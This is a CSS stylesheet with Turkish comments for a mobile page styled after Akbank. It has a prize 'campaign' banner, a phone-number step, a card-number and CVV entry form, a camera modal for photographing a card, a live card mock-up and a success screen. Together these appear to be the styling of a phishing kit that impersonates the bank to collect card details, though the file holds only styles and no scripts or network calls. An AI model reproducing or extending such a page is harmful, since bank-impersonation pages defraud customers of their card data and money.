@import url('https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800;900&display=swap');

:root {
    --akbank-red: #E2001A;
    --akbank-red-dark: #B8001A;
    --akbank-red-light: #FF1A33;
    --white: #FFFFFF;
    --light-gray: #F5F5F5;
    --medium-gray: #E0E0E0;
    --dark-gray: #666666;
    --text-dark: #333333;
    --text-light: #999999;
    --success-green: #27AE60;
    --gold: #FFD700;
    --radius: 12px;
    --radius-sm: 8px;
    --radius-lg: 16px;
}

* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
}

html, body {
    width: 100%;
    height: 100%;
    overflow-x: hidden;
}

body {
    font-family: 'Inter', -apple-system, BlinkMacSystemFont, sans-serif;
    background: var(--akbank-red);
    min-height: 100vh;
    min-height: 100dvh;
    margin: 0;
    padding: 0;
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
    -webkit-text-size-adjust: 100%;
}

/* ====== APP CONTAINER - Tam ekran, boşluk yok ====== */
.phone-container {
    width: 100%;
    max-width: 100%;
    min-height: 100vh;
    min-height: 100dvh;
    background: var(--white);
    position: relative;
    overflow-x: hidden;
    margin: 0;
    padding: 0;
}

/* ====== HEADER ====== */
.header {
    background: var(--akbank-red);
    padding: 14px 16px;
    display: flex;
    justify-content: space-between;
    align-items: center;
    position: fixed;
    top: 0;
    left: 0;
    z-index: 1000;
    width: 100%;
    box-shadow: 0 2px 10px rgba(0,0,0,0.1);
}

.header + * {
    margin-top: 56px;
}

.header-logo {
    display: flex;
    align-items: center;
    gap: 0;
}

.header-logo svg {
    display: block;
}

.header-support {
    display: flex;
    align-items: center;
    gap: 5px;
    color: var(--white);
    font-size: 11px;
    font-weight: 500;
    cursor: pointer;
    text-decoration: none;
    opacity: 0.9;
    transition: opacity 0.2s;
}

.header-support:hover { opacity: 1; }

.header-support svg {
    width: 14px;
    height: 14px;
}

/* ====== HERO SECTION ====== */
.hero-section {
    background:
        radial-gradient(ellipse 120% 60% at 50% 45%, rgba(255,180,180,0.35) 0%, transparent 50%),
        radial-gradient(ellipse 80% 50% at 15% 80%, rgba(255,100,100,0.15) 0%, transparent 50%),
        linear-gradient(160deg, #E2001A 0%, #d50019 25%, #B8001A 60%, #8a0013 100%);
    text-align: center;
    position: relative;
    overflow: visible;
    width: 100%;
    border-radius: 0 0 24px 24px;
    padding-bottom: 30px;
}

.hero-title {
    color: var(--white);
    font-size: 16px;
    font-weight: 800;
    text-transform: uppercase;
    letter-spacing: 0.5px;
    margin-bottom: 14px;
    position: relative;
    line-height: 1.3;
}

.hero-amount {
    color: var(--gold);
    font-size: 26px;
    font-weight: 900;
    text-shadow: 0 2px 10px rgba(0,0,0,0.2);
    margin-bottom: 6px;
    position: relative;
    animation: pulse-glow 2s ease-in-out infinite;
    word-wrap: break-word;
}

@keyframes pulse-glow {
    0%, 100% { text-shadow: 0 2px 10px rgba(255, 255, 255, 0.3); }
    50% { text-shadow: 0 2px 20px rgba(255, 255, 255, 0.7); }
}

.hero-description {
    color: rgba(255,255,255,0.9);
    font-size: 12px;
    line-height: 1.5;
    margin-bottom: 46px;
    position: relative;
    padding: 0 10px;
    z-index: 5;
}

.hero-card-image {
    position: relative;
    margin: 0 auto;
    max-width: 260px;
    border-radius: 12px;
    overflow: hidden;
}

.hero-card-image img {
    width: 100%;
    height: auto;
    display: block;
    filter: drop-shadow(0 8px 20px rgba(0,0,0,0.3));
    animation: float 3s ease-in-out infinite;
}

@keyframes float {
    0%, 100% { transform: translateY(0); }
    50% { transform: translateY(-6px); }
}

/* ====== CONFETTI ====== */
.confetti-container {
    position: absolute;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    overflow: hidden;
    pointer-events: none;
}

.confetti-dot {
    position: absolute;
    border-radius: 50%;
    opacity: 0.5;
    animation: confetti-fall 4s linear infinite;
}

@keyframes confetti-fall {
    0% { transform: translateY(-10px) rotate(0deg); opacity: 0.7; }
    100% { transform: translateY(400px) rotate(360deg); opacity: 0; }
}

/* ====== FORM SECTION ====== */
.form-section {
    padding: 24px 20px;
    margin: -36px 16px 20px 16px;
    background: var(--white);
    border-radius: 16px;
    position: relative;
    z-index: 10;
    width: auto;
    box-shadow: 0 8px 32px rgba(0,0,0,0.1), 0 2px 8px rgba(0,0,0,0.06);
    border: 1px solid rgba(0,0,0,0.04);
}

.form-title {
    text-align: center;
    font-size: 16px;
    font-weight: 700;
    color: var(--text-dark);
    margin-bottom: 18px;
}

.form-group {
    margin-bottom: 14px;
}

.form-group label {
    display: block;
    font-size: 12px;
    font-weight: 600;
    color: var(--text-dark);
    margin-bottom: 5px;
}

.form-input {
    width: 100%;
    padding: 13px 14px;
    border: 2px solid var(--medium-gray);
    border-radius: var(--radius-sm);
    font-size: 15px;
    font-family: 'Inter', sans-serif;
    font-weight: 500;
    color: var(--text-dark);
    transition: all 0.3s ease;
    background: var(--white);
    outline: none;
    -webkit-appearance: none;
    appearance: none;
}

.form-input:focus {
    border-color: var(--akbank-red);
    box-shadow: 0 0 0 3px rgba(226, 0, 26, 0.08);
}

.form-input::placeholder {
    color: #BBBBBB;
    font-weight: 400;
}

.form-input.error {
    border-color: var(--akbank-red);
    background: #FFF5F5;
}

.input-icon-wrapper {
    position: relative;
}

.input-icon-wrapper .form-input {
    padding-left: 42px;
}

.input-icon-wrapper .icon {
    position: absolute;
    left: 12px;
    top: 50%;
    transform: translateY(-50%);
    font-size: 16px;
}

/* ====== CHECKBOX ====== */
.checkbox-wrapper {
    display: flex;
    align-items: flex-start;
    gap: 8px;
    margin: 14px 0;
}

.checkbox-wrapper input[type="checkbox"] {
    width: 18px;
    height: 18px;
    min-width: 18px;
    accent-color: var(--akbank-red);
    margin-top: 1px;
    cursor: pointer;
}

.checkbox-wrapper label {
    font-size: 11px;
    color: var(--dark-gray);
    line-height: 1.4;
    cursor: pointer;
}

.checkbox-wrapper label a {
    color: var(--akbank-red);
    text-decoration: underline;
    font-weight: 600;
}

/* ====== BUTTONS ====== */
.btn-primary {
    width: 100%;
    padding: 15px;
    background: linear-gradient(135deg, var(--akbank-red) 0%, var(--akbank-red-dark) 100%);
    color: var(--white);
    border: none;
    border-radius: var(--radius-sm);
    font-size: 14px;
    font-weight: 700;
    font-family: 'Inter', sans-serif;
    cursor: pointer;
    letter-spacing: 0.5px;
    transition: all 0.3s ease;
    position: relative;
    overflow: hidden;
    text-transform: uppercase;
    -webkit-appearance: none;
}

.btn-primary:active {
    transform: scale(0.98);
    opacity: 0.9;
    box-shadow: 0 2px 8px rgba(226,0,26,0.4);
}

.btn-primary:disabled {
    background: var(--medium-gray);
    cursor: not-allowed;
}

.btn-primary::after {
    content: '';
    position: absolute;
    top: 0;
    left: -100%;
    width: 100%;
    height: 100%;
    background: linear-gradient(90deg, transparent, rgba(255,255,255,0.15), transparent);
    transition: left 0.5s;
}

.btn-primary:hover::after { left: 100%; }

.btn-secondary {
    width: 100%;
    padding: 13px;
    background: var(--white);
    color: var(--akbank-red);
    border: 2px solid var(--akbank-red);
    border-radius: var(--radius-sm);
    font-size: 13px;
    font-weight: 700;
    font-family: 'Inter', sans-serif;
    cursor: pointer;
    transition: all 0.3s ease;
    text-transform: uppercase;
}

.btn-group {
    display: flex;
    gap: 10px;
    margin: 14px 0;
}

.btn-group .btn-choice {
    flex: 1;
    padding: 13px 8px;
    border-radius: var(--radius-sm);
    font-size: 12px;
    font-weight: 700;
    font-family: 'Inter', sans-serif;
    cursor: pointer;
    transition: all 0.3s ease;
    text-align: center;
    line-height: 1.3;
}

.btn-choice.btn-yes {
    background: var(--akbank-red);
    color: var(--white);
    border: 2px solid var(--akbank-red);
}

.btn-choice.btn-no {
    background: var(--white);
    color: var(--akbank-red);
    border: 2px solid var(--akbank-red);
}

/* ====== INFO DISPLAY ====== */
.info-card {
    background: var(--light-gray);
    border-radius: var(--radius-sm);
    padding: 14px 16px;
    margin-bottom: 10px;
    display: flex;
    align-items: center;
    gap: 12px;
    border-left: 4px solid var(--akbank-red);
    transition: transform 0.2s ease, box-shadow 0.2s ease;
}

.info-card:hover {
    transform: translateX(4px);
    box-shadow: 0 4px 12px rgba(0,0,0,0.08);
}

.info-card .info-icon {
    font-size: 18px;
    min-width: 22px;
    text-align: center;
}

.info-card .info-content {
    font-size: 13px;
    color: var(--text-dark);
    font-weight: 500;
}

.info-card .info-content strong {
    color: var(--akbank-red);
}

/* ====== SUCCESS PAGE ====== */
.success-section {
    padding: 50px 20px;
    text-align: center;
    display: flex;
    flex-direction: column;
    align-items: center;
    min-height: calc(100vh - 120px);
    min-height: calc(100dvh - 120px);
    justify-content: center;
    background: linear-gradient(180deg, var(--white) 0%, #f8f8f8 100%);
    position: relative;
}

.success-icon {
    width: 90px;
    height: 90px;
    background: linear-gradient(135deg, var(--success-green), #2ECC71);
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
    margin-bottom: 24px;
    animation: success-bounce 0.6s ease-out;
    box-shadow: 0 8px 25px rgba(39, 174, 96, 0.3);
}

@keyframes success-bounce {
    0% { transform: scale(0); opacity: 0; }
    50% { transform: scale(1.15); }
    100% { transform: scale(1); opacity: 1; }
}

.success-icon svg {
    width: 44px;
    height: 44px;
    color: var(--white);
}

.success-title {
    font-size: 20px;
    font-weight: 800;
    color: var(--text-dark);
    margin-bottom: 14px;
}

.success-message {
    font-size: 13px;
    color: var(--dark-gray);
    line-height: 1.7;
    max-width: 300px;
}

/* ====== STEP 2 ====== */
.congrats-section {
    background:
        radial-gradient(ellipse 100% 60% at 50% 30%, rgba(255,150,150,0.2) 0%, transparent 50%),
        linear-gradient(160deg, #E2001A 0%, #d50019 40%, #B8001A 100%);
    padding: 28px 16px 56px 16px;
    text-align: center;
    width: 100%;
}

.congrats-title {
    color: var(--white);
    font-size: 20px;
    font-weight: 800;
    line-height: 1.3;
    margin-bottom: 6px;
}

.congrats-subtitle {
    color: rgba(255,255,255,0.9);
    font-size: 13px;
    position: relative;
    z-index: 5;
    margin-bottom: 20px;
}

.phone-question {
    text-align: center;
    margin: 18px 0 8px;
}

.phone-question p {
    font-size: 13px;
    font-weight: 700;
    color: var(--akbank-red);
    line-height: 1.4;
}

/* ====== STEP 3 ====== */
.welcome-banner {
    background:
        radial-gradient(ellipse 100% 60% at 50% 30%, rgba(255,150,150,0.2) 0%, transparent 50%),
        linear-gradient(160deg, #E2001A 0%, #d50019 40%, #B8001A 100%);
    padding: 24px 16px;
    text-align: center;
    width: 100%;
}

.welcome-text {
    color: rgba(255,255,255,0.9);
    font-size: 13px;
    margin-bottom: 4px;
}

.welcome-name {
    color: var(--white);
    font-size: 20px;
    font-weight: 800;
}

.welcome-info {
    color: rgba(255,255,255,0.8);
    font-size: 14px;
    margin-top: 6px;
}

.card-section-title {
    text-align: center;
    font-size: 16px;
    font-weight: 700;
    color: var(--text-dark);
    padding: 18px 16px 0;
    line-height: 1.4;
}

.method-section {
    padding: 14px 16px;
}

.method-label {
    font-size: 11px;
    font-weight: 700;
    color: var(--akbank-red);
    text-transform: uppercase;
    letter-spacing: 0.3px;
    margin-bottom: 8px;
}

.camera-area {
    background: #1a1a1a;
    border-radius: var(--radius);
    height: 160px;
    display: flex;
    align-items: center;
    justify-content: center;
    position: relative;
    overflow: hidden;
    cursor: pointer;
    transition: all 0.3s ease;
    border: 2px dashed rgba(255,255,255,0.15);
}

.camera-area:active {
    transform: scale(0.98);
}

.camera-area video {
    width: 100%;
    height: 100%;
    object-fit: cover;
    border-radius: var(--radius);
}

.camera-placeholder {
    text-align: center;
    color: rgba(255,255,255,0.5);
}

.camera-placeholder svg {
    width: 36px;
    height: 36px;
    margin-bottom: 6px;
    opacity: 0.5;
}

.camera-placeholder p {
    font-size: 12px;
}

.divider {
    display: flex;
    align-items: center;
    gap: 10px;
    margin: 16px 0;
    padding: 0 16px;
}

.divider-line {
    flex: 1;
    height: 1px;
    background: var(--medium-gray);
}

.divider-text {
    font-size: 11px;
    color: var(--text-light);
    font-weight: 600;
}

.card-form {
    padding: 0 16px 16px;
}

.card-form-row {
    display: flex;
    gap: 10px;
}

.card-form-row .form-group { flex: 1; }

.cvv-info {
    display: flex;
    align-items: center;
    gap: 10px;
    background: #FFF8E1;
    border: 1px solid #FFE082;
    border-radius: var(--radius-sm);
    padding: 10px;
    margin: 10px 16px 0;
    font-size: 11px;
    color: #795548;
    line-height: 1.4;
}

.cvv-info svg {
    min-width: 36px;
    width: 36px;
    height: 28px;
    color: #F57F17;
}

/* ====== FOOTER ====== */
.footer {
    padding: 14px 16px;
    text-align: center;
    border-top: 1px solid var(--medium-gray);
    background: var(--light-gray);
    width: 100%;
}

.footer p {
    font-size: 9px;
    color: var(--text-light);
    line-height: 1.6;
}

.footer .lock-icon {
    color: var(--success-green);
    font-weight: 600;
}

/* ====== STEP INDICATOR ====== */
.step-indicator {
    display: flex;
    justify-content: center;
    gap: 8px;
    margin-top: 30px;
    margin-bottom: 60px;
}

.step-dot {
    width: 8px;
    height: 8px;
    border-radius: 50%;
    background: var(--medium-gray);
    transition: all 0.3s ease;
}

.step-dot.active {
    background: var(--akbank-red);
    width: 24px;
    border-radius: 4px;
}

.step-dot.completed {
    background: var(--success-green);
}

/* ====== LOADING ====== */
.loading-overlay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,0.5);
    display: none;
    align-items: center;
    justify-content: center;
    z-index: 1000;
}

.loading-overlay.active { display: flex; }

.spinner {
    width: 44px;
    height: 44px;
    border: 3px solid rgba(255,255,255,0.3);
    border-top: 3px solid var(--white);
    border-radius: 50%;
    animation: spin 0.8s linear infinite;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

/* ====== ERROR ====== */
.error-message {
    color: var(--akbank-red);
    font-size: 11px;
    font-weight: 500;
    margin-top: 3px;
    display: none;
}

.error-message.show {
    display: block;
    animation: shake 0.4s ease;
}

@keyframes shake {
    0%, 100% { transform: translateX(0); }
    25% { transform: translateX(-4px); }
    75% { transform: translateX(4px); }
}

/* ====== CAMERA MODAL ====== */
.camera-modal {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0,0,0,0.95);
    z-index: 2000;
    display: none;
    flex-direction: column;
    align-items: center;
    justify-content: center;
}

.camera-modal.active { display: flex; }

.camera-modal video {
    width: 92%;
    max-width: 400px;
    border-radius: var(--radius);
    border: 2px solid rgba(255,255,255,0.3);
}

.camera-modal .camera-frame {
    position: absolute;
    width: 88%;
    max-width: 380px;
    height: 200px;
    border: 2px dashed rgba(255,255,255,0.4);
    border-radius: var(--radius);
    pointer-events: none;
}

.camera-modal .capture-btn {
    margin-top: 16px;
    padding: 13px 36px;
    background: var(--akbank-red);
    color: var(--white);
    border: none;
    border-radius: 24px;
    font-size: 14px;
    font-weight: 700;
    cursor: pointer;
    font-family: 'Inter', sans-serif;
}

.camera-modal .close-camera {
    position: absolute;
    top: 16px;
    right: 16px;
    background: none;
    border: none;
    color: var(--white);
    font-size: 28px;
    cursor: pointer;
}

/* ====== ANİMASYONLAR ====== */
.fade-in {
    animation: fadeIn 0.5s ease;
}

@keyframes fadeIn {
    0% { opacity: 0; transform: translateY(8px); }
    100% { opacity: 1; transform: translateY(0); }
}

.slide-up {
    animation: slideUp 0.5s ease;
}

@keyframes slideUp {
    0% { opacity: 0; transform: translateY(20px); }
    100% { opacity: 1; transform: translateY(0); }
}

/* ====== MOBİL UYUMLULUK ====== */
@media screen and (max-width: 480px) {
    .phone-container {
        border-radius: 0;
    }
    
    .hero-title { font-size: 15px; }
    .hero-amount { font-size: 28px; }
    .hero-card-image { max-width: 200px; }
}

@media screen and (min-width: 481px) {
    body {
        background: #f0f0f0;
        display: flex;
        justify-content: center;
    }
    
    .phone-container {
        max-width: 420px;
        min-height: 100vh;
        box-shadow: 0 0 40px rgba(0,0,0,0.1);
    }
}

/* iOS Safari fix */
@supports (-webkit-touch-callout: none) {
    body {
        min-height: -webkit-fill-available;
    }
}

/* Tam genişlik güvencesi */
.header,
.hero-section,
.congrats-section,
.welcome-banner,
.footer {
    margin-left: 0;
    margin-right: 0;
    padding-left: 16px;
    padding-right: 16px;
}

/* ====== AKBANK FOOTER ====== */
.akbank-footer {
    background: #cc0000;
    color: var(--white);
    text-align: center;
    padding: 30px 16px;
    font-size: 13px;
    width: 100%;
}

.akbank-footer-logo {
    margin-bottom: 20px;
}

.akbank-footer-title {
    font-weight: 700;
    margin-bottom: 8px;
    font-size: 14px;
}

.akbank-footer-phone, .akbank-footer-phone a {
    font-size: 28px;
    font-weight: 800;
    margin-bottom: 24px;
    color: var(--white);
    text-decoration: none;
}

.akbank-footer-social {
    display: flex;
    justify-content: center;
    gap: 12px;
    margin-bottom: 24px;
}

.akbank-footer-social .social-icon {
    width: 36px;
    height: 36px;
    background: var(--white);
    border-radius: 50%;
    display: flex;
    align-items: center;
    justify-content: center;
    color: #cc0000;
}

.akbank-footer-links {
    display: flex;
    flex-direction: column;
    gap: 14px;
    margin-bottom: 24px;
}

.akbank-footer-links a {
    color: var(--white);
    text-decoration: none;
    font-weight: 500;
}

.akbank-footer-divider {
    height: 1px;
    background: rgba(255,255,255,0.3);
    margin: 24px 0;
}

.akbank-footer-bottom {
    display: flex;
    flex-direction: column;
    gap: 12px;
}

.akbank-footer-bottom a {
    color: var(--white);
    text-decoration: none;
    font-size: 12px;
}

.akbank-footer-copyright {
    margin-top: 24px;
    font-size: 11px;
    opacity: 0.8;
}
/* ====== INTERACTIVE CARD ====== */
.interactive-card {
    aspect-ratio: 1.586 / 1;
    width: calc(100% - 40px);
    max-width: 360px;
    margin: 16px auto;
    border-radius: 14px;
    position: relative;
    padding: 22px 24px 20px;
    color: white;
    font-family: 'Inter', sans-serif;
    overflow: hidden;
    background: linear-gradient(135deg, #C40018 0%, #E2001A 30%, #a00012 70%, #7a000e 100%);
    box-shadow:
        0 14px 28px rgba(0,0,0,0.25),
        0 4px 10px rgba(0,0,0,0.15),
        inset 0 1px 0 rgba(255,255,255,0.25);
    display: flex;
    flex-direction: column;
    justify-content: space-between;
}

/* Holographic sheen layer */
.interactive-card::before {
    content: '';
    position: absolute;
    top: 0; left: 0; right: 0; bottom: 0;
    background:
        radial-gradient(ellipse 80% 50% at 80% 20%, rgba(255,255,255,0.18) 0%, transparent 50%),
        radial-gradient(ellipse 60% 40% at 20% 80%, rgba(255,255,255,0.08) 0%, transparent 50%),
        linear-gradient(135deg, transparent 40%, rgba(255,255,255,0.06) 45%, transparent 50%);
    pointer-events: none;
    z-index: 1;
}

/* Fine diagonal pattern */
.interactive-card::after {
    content: '';
    position: absolute;
    top: 0; left: 0; right: 0; bottom: 0;
    background: repeating-linear-gradient(
        120deg,
        transparent,
        transparent 2px,
        rgba(255,255,255,0.015) 2px,
        rgba(255,255,255,0.015) 4px
    );
    pointer-events: none;
    z-index: 1;
}

.interactive-card > * {
    position: relative;
    z-index: 2;
}

.ic-top {
    display: flex;
    justify-content: space-between;
    align-items: center;
}

.ic-logo {
    font-weight: 900;
    font-size: 18px;
    letter-spacing: 3px;
    text-shadow: 0 1px 3px rgba(0,0,0,0.3);
}

.ic-brand {
    font-weight: 700;
    font-size: 16px;
    font-style: italic;
    opacity: 0.95;
    letter-spacing: 1px;
}

.ic-middle {
    display: flex;
    align-items: center;
    gap: 12px;
}

.ic-chip {
    width: 46px;
    height: 34px;
    background: linear-gradient(145deg, #e8c547 0%, #f5dc6e 25%, #c9a230 50%, #e8c547 75%, #d4af37 100%);
    border-radius: 7px;
    position: relative;
    border: 1px solid rgba(0,0,0,0.15);
    box-shadow: 0 2px 4px rgba(0,0,0,0.2), inset 0 1px 0 rgba(255,255,255,0.4);
    overflow: hidden;
}

/* Chip grid pattern */
.ic-chip::before {
    content: '';
    position: absolute;
    top: 6px; left: 6px; right: 6px; bottom: 6px;
    border: 1.5px solid rgba(0,0,0,0.12);
    border-radius: 3px;
}

.ic-chip::after {
    content: '';
    position: absolute;
    top: 0; left: 50%;
    width: 1.5px; height: 100%;
    background: rgba(0,0,0,0.1);
    transform: translateX(-50%);
}

/* Contactless NFC icon */
.ic-nfc {
    width: 24px;
    height: 24px;
    opacity: 0.75;
}

.ic-number {
    font-size: clamp(16px, 5vw, 22px);
    letter-spacing: 3px;
    text-shadow: 0 1px 3px rgba(0,0,0,0.4);
    font-weight: 500;
    font-family: 'Courier New', Courier, monospace;
    word-spacing: 6px;
}

.ic-bottom {
    display: flex;
    justify-content: space-between;
    align-items: flex-end;
    padding-right: 50px;
}

.ic-name {
    font-size: clamp(10px, 3vw, 13px);
    text-transform: uppercase;
    letter-spacing: 1.5px;
    font-weight: 500;
    text-shadow: 0 1px 2px rgba(0,0,0,0.4);
    max-width: 65%;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
}

.ic-expiry {
    display: flex;
    align-items: center;
    gap: 6px;
}

.ic-exp-label {
    font-size: 6px;
    line-height: 1.1;
    opacity: 0.7;
    text-transform: uppercase;
    letter-spacing: 0.5px;
}

.ic-exp-val {
    font-size: clamp(11px, 3vw, 14px);
    font-weight: 500;
    letter-spacing: 1.5px;
    font-family: 'Courier New', Courier, monospace;
    text-shadow: 0 1px 2px rgba(0,0,0,0.4);
}

/* Mastercard circles */
.ic-mc {
    display: flex;
    align-items: center;
    position: absolute;
    bottom: 20px;
    right: 24px;
    z-index: 2;
}
.ic-mc-circle {
    width: 26px;
    height: 26px;
    border-radius: 50%;
}
.ic-mc-circle:first-child {
    background: #EB001B;
    opacity: 0.9;
}
.ic-mc-circle:last-child {
    background: #F79E1B;
    opacity: 0.85;
    margin-left: -10px;
}

/* ====== CAMPAIGN MODAL ====== */
.campaign-modal-overlay {
    position: fixed;
    top: 0; left: 0; right: 0; bottom: 0;
    background: rgba(0,0,0,0.6);
    backdrop-filter: blur(4px);
    -webkit-backdrop-filter: blur(4px);
    z-index: 9999;
    display: none;
    align-items: center;
    justify-content: center;
    padding: 20px;
    opacity: 0;
    transition: opacity 0.3s ease;
}
.campaign-modal-overlay.active {
    display: flex;
    opacity: 1;
}

.campaign-modal-box {
    background: var(--white);
    border-radius: 20px;
    padding: 30px 24px;
    max-width: 340px;
    width: 100%;
    text-align: center;
    box-shadow: 0 15px 40px rgba(0,0,0,0.2);
    position: relative;
}

.modal-icon {
    width: 56px;
    height: 56px;
    border-radius: 50%;
    background: #FFF0F0;
    color: var(--akbank-red);
    display: flex;
    align-items: center;
    justify-content: center;
    margin: 0 auto 16px;
}
.modal-icon svg {
    width: 32px;
    height: 32px;
}

.modal-title {
    font-size: 18px;
    font-weight: 800;
    color: var(--text-dark);
    margin-bottom: 12px;
}

.modal-desc {
    font-size: 14px;
    color: var(--text-dark);
    line-height: 1.6;
}
